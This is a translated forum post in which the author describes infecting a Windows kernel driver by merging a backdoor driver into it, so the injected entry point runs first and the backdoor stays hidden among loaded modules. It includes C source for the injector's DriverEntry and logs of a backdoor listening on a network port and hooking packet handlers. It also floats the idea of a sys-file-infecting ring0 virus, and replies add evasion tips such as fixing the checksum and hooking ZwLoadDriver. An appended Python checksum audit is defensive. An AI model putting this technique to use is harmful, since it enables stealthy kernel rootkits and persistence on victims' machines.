A Method for loading drivers

Source: Internet
Author: User
I had been thinking about this for a long time, and only in the last two days did I put together a rough version of the program.

While that problem was being solved, I thought about infecting the kernel file ntoskrnl.exe at startup. Later I thought that would be too conspicuous, and it was annoying that it could not be loaded before the kernel, only at some chosen point inside it. Later I infected a driver instead. This solution solves three problems for my backdoor: file storage, startup, and hiding of the kernel module. Of course, the driver loading method has changed to combining the two sys files into one: the .text, .data and .rdata of the inject file are appended to the original file (the inject file's code and data segments must be .text and .data, to keep it simple), then the APIs required by the two files are picked out and merged into the import directory and IAT, and then a new .reloc is created from the two files' original .reloc sections. These are all boring jobs -___- more and more I feel like a typist. The program entry of the new file is set to the DriverEntry of the inject file, which then calls the DriverEntry of the original file; in this way, when the original file is the infected driver, our injected driver is called first. Of course, the kernel module shown will not be the injected driver. :P In the experiment, the backdoor driver was inserted into a helloworld driver, which was thereby infected.
#include <ntddk.h>

int i;

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    //DbgPrint("My Driver Unloaded!\n");
}
//--------------------------------------------------------------------
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    //DbgPrint("My Driver Loaded!\n");
    DriverObject->DriverUnload = OnUnload;
    DbgPrint("inject SYS %d\n", i);
    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
This driver prints just one line, and its DriverEntry refers to a global variable (i).
//--------------------------------------------------------------------
typedef NTSTATUS (*DRIVERENTRY)(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath);

ULONG fakeDriverEntryOffset = 0x87654321;   // placeholder, filled in when the two files are merged
ULONG realDriverEntry       = 0x12345678;   // placeholder: the original driver's DriverEntry

VOID OnUnload(IN PDRIVER_OBJECT DriverObject);  // as in the listing above
VOID InitWorkThread(IN PVOID Context);         // the backdoor's worker thread; its body is not shown on the page
//--------------------------------------------------------------------
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS status;
    HANDLE   hThread;
    ULONG    base;

    // get the address the code is actually running at
    __asm {
        call forward
    back:
        pop base
        jmp outofthis
    forward:
        jmp back
    }
outofthis:
    DbgPrint("Driver begin!\n");
    //__asm int 3;
    DbgPrint("base: 0x%x\n", base);
    // adjust the stored entry address by the difference between the actual and the expected load address
    realDriverEntry = realDriverEntry + ((base - fakeDriverEntryOffset) & 0xFFFFF000);
    DriverObject->DriverUnload = OnUnload;
    DbgPrint("realDriverEntry: 0x%x\n", realDriverEntry);
    // call the original driver's DriverEntry
    ((DRIVERENTRY)realDriverEntry)(DriverObject, RegistryPath);
    status = PsCreateSystemThread(&hThread, (ACCESS_MASK)0, NULL, (HANDLE)0, NULL, InitWorkThread, DriverObject);
    if (!NT_SUCCESS(status)) {
        DbgPrint("error when create the thread\n");
        return status;   // was 'return FALSE', which is 0 == STATUS_SUCCESS
    }
    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
After the infected driver is loaded, "Driver begin!" is displayed:
Base: 0xf7e4d29f
Realdriverentry: 0xf7e4b313
Inject sys 0 <--------------------------- the infected DriverEntry is called.
Listening on port 9929 wait on ksemsendlistsemaphore
Miniport-> packetindicatehandler: f9d35480
Our packetindicatehandler f7e4cdf4

The backdoor is working normally. I wanted to infect some system-level sys files and tried two, acpi.sys and watchdog.sys (I don't know whether they count as system-level, but they are present when the system is turned on). The result was a direct check as soon as the system started, and I didn't know whether merging my own files was the hard part; the error does not seem that simple. Ah, I know too little about the system. This is just a train of thought, but it proves that the method is feasible. In addition, to load the driver you only need to be able to modify the file permissions (but it seems that is the same as being administrator -___-). The process of loading drivers at system startup is unknown to me, and it is not successful yet: the driver is inserted too late, because many functions are not available once the system is up. One can imagine a firewall or anti-virus driver being infected. :P I was totally depressed by this program during this time, and it has gone on for 3 more lines,,, it will be improved later :( I feel like a linker now; if there were two OBJ files, maybe I would actually make them into an EXE. Now I can consider making a ring0 virus that specifically infects sys files. I don't know about viruses, but the ntoskrnl loading location is usually fixed, so you can find the API in the PE image,,, however, we need to compile -___-. The advantage of merging two drivers is that we can use C and basically not change these two drivers, which by the way makes it convenient to compile complex things,,. .reloc is really a good thing :>

vxk published on pm, ip: 221.201.108.*
The method is correct, but you must write the CRC sum correctly. In addition, it is best not to touch the ACPI in the table. I have learned more from the above painful lessons...


vxk published on pm, ip: 221.201.108.*
You can hook ZwLoadDriver to wait for XXX to load. After XXX has loaded, you can start...
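An added, defender-side example, not code from the post or from vxk's replies: a Python integrity check over a driver image that recomputes the PE CheckSum vxk says must be written correctly (the documented ImageHlp algorithm, which the PE spec says is validated at load time for drivers) and reports whether the entry point lies in .text. The image is a constructed minimal PE32 with .text and .data sections, not a real driver; the section layout and all offsets are assumptions of this example.

```python
import struct

# Constructed sample: a minimal PE32 image with a .text and a .data section (not a real driver).
def build_image(entry_rva, checksum=0):
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 64)
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "IIIIHH" + "I" * 6,
                      0x10B, 14, 0, 0x200, 0x200, 0, entry_rva, 0x1000, 0x2000, 0x10000,
                      0x1000, 0x200, 10, 0, 0, 0, 10, 0, 0, 0x3000, 0x200, checksum, 1, 0,
                      0x40000, 0x1000, 0x100000, 0x1000, 0, 16) + bytes(128)  # 16 empty data dirs
    sect = lambda n, va, raw, ch: struct.pack("<8sIIIIIIHHI", n, 0x200, va, 0x200, raw, 0, 0, 0, 0, ch)
    hdr = dos + coff + opt + sect(b".text", 0x1000, 0x200, 0x60000020) + sect(b".data", 0x2000, 0x400, 0xC0000040)
    hdr += bytes(0x200 - len(hdr))                        # pad to SizeOfHeaders
    return bytearray(hdr + bytes(range(256)) * 2 + bytes(0x200))  # filler .text and .data bodies

def parse(img):
    """Return (entry RVA, offset of the CheckSum field, stored checksum, [(name, va, vsize), ...])."""
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    nsect = struct.unpack_from("<H", img, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", img, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                   # optional header follows the 20-byte COFF header
    entry = struct.unpack_from("<I", img, opt + 16)[0]
    stored = struct.unpack_from("<I", img, opt + 64)[0]
    secs = [struct.unpack_from("<8sII", img, opt + opt_size + 40 * i) for i in range(nsect)]
    return entry, opt + 64, stored, [(n.rstrip(b"\0").decode(), va, vs) for n, vs, va in secs]

def pe_checksum(img, cs_off):
    """Documented ImageHlp CheckSumMappedFile algorithm: one's-complement sum of the file's
    dwords, skipping the CheckSum field itself, folded to 16 bits, plus the file length."""
    padded, total = bytes(img) + bytes(-len(img) % 4), 0
    for i in range(0, len(padded), 4):
        if i != cs_off:
            total += struct.unpack_from("<I", padded, i)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(img)

def audit(img):
    """Findings for a driver image: a stale CheckSum (the file was modified without the header
    being updated) and an entry point outside .text.  A matching checksum proves nothing by
    itself, since whoever rewrites the file can recompute it; the real control is the code signature."""
    entry, cs_off, stored, secs = parse(img)
    findings = []
    if stored != pe_checksum(img, cs_off):
        findings.append("checksum mismatch")
    sec = next((n for n, va, vs in secs if va <= entry < va + vs), None)
    if sec != ".text":
        findings.append("entry point in " + (sec or "no section"))
    return findings
```

A merged driver that keeps its entry inside .text passes the second check, so treat the entry-point test as a cheap triage signal only and rely on signature verification for the verdict.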
